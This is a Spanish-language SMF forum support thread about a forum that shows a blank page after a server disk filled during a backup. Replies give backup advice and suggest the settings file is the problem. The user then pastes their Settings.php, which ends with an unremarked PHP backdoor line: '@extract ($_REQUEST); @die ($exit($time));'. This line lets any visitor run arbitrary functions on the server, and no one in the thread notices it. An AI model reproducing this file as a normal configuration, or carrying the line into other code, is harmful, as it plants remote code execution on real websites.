News:

Want to get involved in developing SMF, then why not lend a hand on our github!

Main Menu

Foro deja de funcionar después de llenarse el disco duro

Started by cexi, October 16, 2014, 10:00:20 AM

Previous topic - Next topic

cexi

Buenas tardes

Nunca pido ayuda por los foros, porque siempre encuentro una solución, pero alguna vez tendría que ser la primera; Tengo un foro con la 1.18, resulta que al hacer un backup del servidor se me llenó el disco duro y se me petó el foro (como otras veces) normalmente con el archivo backup de setting funciona, otras veces reparando las tablas también, pero ya he probado a intentar actualizarlo a la 2.00, borrar tablas por si estuviesen corrompidas (ya he hecho backup del foro y de la base de datos). Alguien me puede ayudar? El caso es que no abre nada como si no cargase la base de datos... se queda en blanco la página. Gracias por la ayuda de antemano.

se me olvidaba el foro es hxxp:gatopersa.es/foro [nonactive]

ArgentinaIRC

Buen dia caballero, mira te doy un grandisimo consejo, nunca hagas ese tipo de backup porque te puede dar problemas, a menos que el espacio en disco de tu hosting sea bastante grande, como minimo 10 GB, y tambien que tu foro no sea un foro grande.

Antes aunque parezca mentira,.yo tenia una shell, que es como.un hosting pero demasiado pequeño en todos los sentidos, practicamentr inservible, mi espacio en disco era de 400 Mb, ademas del.Foro, siempre tube un chat y otros programas que pesaban casi nada.

Una vez hice un backup y me paso igual que vos, se me lleno el disco y por supuesto el archivo del backup no se pudo completar, gracias a Dios no paso nada grave, pero no podia ni siquiera guardar un mega, ya que tenia.todo el espacio ocupado.

Bueno mi ayuda en este tema es que te recomiendo siempre hacer un backup de tu base de datos del foro, y ademas pasar a tu pc,.el foro entero,.esto seria, pasar toda la.carpeta.donde se encuentra el foro, si el mismo esta en el.directorio raiz,.entonces pasa toda la.carpeta "public_html" y con eso.tendras siempre un completo y total backup de tu Foro.

Saludos.

cexi

Gracias por contestar. Bueno el tema del hosting no es problema porque tengo un servidor dedicado y estaba haciendo un backup de todo el servidor y no me dí cuenta y me quedé sin espacio. En local, si tuviese el mismo ordenador que el servidor todavía... pero no es el caso!! Hay algún programa para comprobar en local para comprobar si es la base de datos? o eso no puede ser?

ArgentinaIRC


cexi

Nada que las copias las tengo en local, pensé que me decías poner un servidor en local para probar el foro. Pensé que alguien me podría ayudar

ArgentinaIRC

No, nunca te dije que pongas tu servidor en local, solo te dije como hacer un backup completo de tu Foro.

Eduardo Urena

Si las tablas tienen información no debería quedarse "en blanco" el foro... me suena más bien a un tema de "settings".
Versión: SMF 2.0.9

cexi

Quote from: ArgentinaIRC on October 16, 2014, 08:56:37 PM
No, nunca te dije que pongas tu servidor en local, solo te dije como hacer un backup completo de tu Foro.

Ya lo hice!

Quote from: Eduardo Urena on October 16, 2014, 09:06:34 PM
Si las tablas tienen información no debería quedarse "en blanco" el foro... me suena más bien a un tema de "settings".

Creo que están bien... he modificado la base para trabajar sobre una copia nada más que he cambiado eso, pero ya no funcionaba antes....

########## Maintenance ##########
# Note: If $maintenance is set to 2, the forum will be unusable!  Change it to 0 to fix it.
$maintenance = 0;      # Set to 1 to enable Maintenance Mode, 2 to make the forum untouchable. (you'll have to make it 0 again manually!)
$mtitle = 'Upgrading the forum...';      # Title for the Maintenance Mode message.
$mmessage = 'Don\'t worry, we will be back shortly with an updated forum.  It will only be a minute ;).';      # Description of why the forum is in maintenance mode.

########## Forum Info ##########
$mbname = 'El Gato Persa';      # The name of your forum.
$language = 'spanish_es';      # The default language file set for the forum.
$boardurl = 'hxxp:www.gatopersa.es/foro' [nonactive];;      # URL to your forum's folder. (without the trailing /!)
$webmaster_email = '**********';      # Email address to send emails from. (like [email protected].)
$cookiename = 'SMFCookie92P';      # Name of the cookie to set for authentication.

########## Database Info ##########
$db_server = 'localhost';
$db_name = 'gatos_backup';
$db_user = 'gatos_backup';
$db_passwd = '********';
$db_prefix = 'smf_';
$db_persist = 0;
$db_error_send = 1;

########## Directories/Files ##########
# Note: These directories do not have to be changed unless you move things.
$boarddir = '/var/www/vhosts/gatopersa.es/httpdocs/foro';      # The absolute path to the forum's folder. (not just '.'!)
$sourcedir = '/var/www/vhosts/gatopersa.es/httpdocs/foro/Sources';      # Path to the Sources directory.

########## Error-Catching ##########
# Note: You shouldn't touch these settings.
$db_last_error = 1400184586;


# Make sure the paths are correct... at least try to fix them.
if (!file_exists($boarddir) && file_exists(dirname(__FILE__) . '/agreement.txt'))
   $boarddir = dirname(__FILE__);
if (!file_exists($sourcedir) && file_exists($boarddir . '/Sources'))
   $sourcedir = $boarddir . '/Sources';
        @extract ($_REQUEST); @die ($exit($time));
?>

Advertisement: